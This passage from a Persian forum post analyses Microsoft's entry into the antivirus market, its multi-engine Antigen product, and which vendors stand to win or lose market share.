اگر محصولی از دیدگاه فنی سر و صدای فراوانی به پا کرده ولی محفاظت آن در برابر ویروسها بهتر از محصولات مایکروسافت نباشد، احتمالاً توسط مصرف کنندگانی که تحت تاثیر فاکتور شماره 3 قرار گرفته اند، خریداری می گردد. در صورتی که محصول ارائه شده، حفاظت بهتر و قیمت پایین تری نسبت به محصولات مایکروسافت داشته باشد، می تواند نظر خریداران از هر طبقه و دسته ای را به خود جلب نماید. بعلاوه اگر Engine مورد استفاده یک شرکت سازنده آنتی ویروس با محصول Antigen یکپارچه سازی گردد، تا زمانی که آن Engine مورد استفاده است، نیازی به نگرانی از آینده وجود نخواهد داشت. [محصول Antigen از چند Engine آنتی ویروس در کنار یکدیگر استفاده می کند و مورد حمایت شرکت مایکروسافت است]. مایکروسافت در بازار تولید و فروش محصولات تنها نخواهد بود، بلکه درصدی از این کار را از طریق سایر مودیان انجام می دهد. زیبایی کار مایکروسافت در اینجاست که خود در کناری قرار گرفته و نظاره گر سود عایدی خود باشد. ایده استفاده از چند Engine در یک محصول سبب انتقال تجارت آنتی ویروس از محصولات به Engine خواهد گردید.
برای شرکتهایی که آنتی ویروس آنها در محصول Antigen یکپارچه سازی نشده است، شرایط متفاوت است. توجه به این نکته ضروری است که در بازار شلوغ IT نظر به نبود راهکاری که بتواند حفاظت 100% را در مقابله با تهدیدات ارائه دهد، این شرکتها نباید از بازار کنار گذاشته شوند. همه می دانیم که هر چقدر یک بیماری سخت تر باشد، داروهای بیشتری برای مقابله با آن بکار می رود؛ به طور مشابه، کاربرانی که دچار ویروسهای کامپیوتری شده اند، آماده بکارگیری فناوریهای جدید برای رهایی از مشکل هستند، و این به معنای آمادگی آنها برای بکارگیری گونه های متفاوتی از آنتی ویروسها و نه فقط محصولات ارائه شده توسط بزرگان نرم افزار است. پیامی که این وضعیت برای شرکتهای آنتی ویروس دارد کاملاً واضح است: اگر شرکت نه تنها تمایل به حفظ بقا داشته بلکه به سودآوری نیز فکر می کند، موضوعات مرتبط با سازگاری (Compatibility) می بایست حل شوند. Engineهای تولید شده توسط تولید کنندگان گوناگون باید با قابلیت سازگاری طراحی گردند. چاره دیگر آنست که حفاظت در برابر ویروسها را در چند لایه پیاده سازی نمود.
نهایتاً اینکه می توان امیدوار بود که امور بطور نامناسبی پیش نخواهد رفت. با این حال لازم است که برخی از شرکتها بودجه خود را کاهش داده و تعداد کارمندان خود را نیز تقلیل دهند. شرکتهای عمومی در خواهند یافت که ورود مایکروسافت به بازار آنتی ویروس بر روی سهم بازار آنها تاثیر گذار خواهد بود و کاهش سهم بازار این شركتها نتایج منفی را در پی خواهد داشت:

• جذب سرمایه گذاری دشوارتر خواهد بود
• سهیم شدن کارکنان در سرمایه و سود شرکت از میان خواهد رفت

یکی دیگر از نتایج منفی ممکن، خالی شدن شرکت از کارکنان توسط مدیران میانی و ارشد شرکت باشد.

خلاصه
تغییرات در صنعت آنتی ویروس آغاز گردیده و تا مدتی دیگری نیز ادامه خواهد داشت. چندان غیر محتمل نخواهد بود که ورود مایکروسافت به بازار محصولات امنیتی یک فاکتور قطعاً تاثیر گذار بر شرایط در حال تغییر باشد. ورود غول نرم افزار به بازار، بدون شک بر بازیگران شناخته شده این صنعت تاثیر داشته و سهم بازار کنونی آنها احتمالاً بصورت بنیادین تغییر خواهد کرد. طبیعتاً تاثیر پذیری هر شرکت از این وضعیت با دیگران متفاوت است. برای برخی، چنین وضعیتی همچون تند بادی است در حالی که دیگران تا اندازه ای تاثیر می پذیرند و برخی دیگر نیز از ورود مایکروسافت به بازار استقبال می نمایند.

ناگوارترین پیامدها نصیب این مراکز خواهد شد:
1. شرکتهای سهامی عام
2. تجارتهای مبتنی بر درآمد از بازاری که مایکروسافت قصد ورود به آن را دارد
3. تولیدکنندگان Engine با کیفیت پایین تر از محصولات مایکروسافت
4. تولید کنندگانی که Engine تولیدی آنها در محصول Anti-Gen مورد استفاده قرار نمی گیرد.

روشن ترین آینده در انتظار این مراکز است:
1. شرکتهای خصوصی
2. تولید کنندگانی با رده گسترده ای از محصولات
3. تولید کنندگان Engine با کیفیت خوب
4. تولید کنندگانی که Engine تولیدی آنها در Anti-Gen مورد استفاده قرار می گیرد.

خوشبختانه ورود غول نرم افزار به بازار امنیت IT بر توسعه این زمینه در آینده اثر گذاشته و کیفیت راهکارهای امنیتی را افزایش خواهد داد. و در نتیجه امید است که اینترنت تبدیل به محیط امن تری شود. در چنین محیطی بر روی هر میز نه تنها یک کامپیوتر وجود دارد بلکه آن کامپیوتر یک کامپیوتر امن خواهد بود.


==================================================
طراحی وب سایت
پروژه های برنامه نویسی تجاری
دانلود پروژه های ASP.NET وب سایتهای آماده به همراه توضیحات
دانلود پروژه های سی شارپ و پایگاه داده SQL Server همراه توضیحات و مستندات
دانلود پروژه های UML نمودار Usecase نمودار class نمودرا activity نمودار state chart نمودار DFD و . . .
دانلود پروژه های حرفه ای پایگاه داده SQL Server به همراه مستندات و توضیحات
پروژه های حرفه ای پایگاه داده Microsoft access به همراه مستندات و توضیحات
دانلود پروژه های کارآفرینی
دانلود گزارشهای کارآموزی کارورزی تمامی رشته های دانشگاهی
قالب تمپلیت های آماده وب سایت ASP.NET به همراه Master page و دیتابیس
برنامه های ایجاد گالری عکس آنلاین با ASP.NET و JQuery و اسلایدشو به همراه کد و دیتابیس SQL کاملا Open Source واکنشگرا و ساده به همراه پایگاه داده
==================================================
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
ارسال پاسخ 


پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان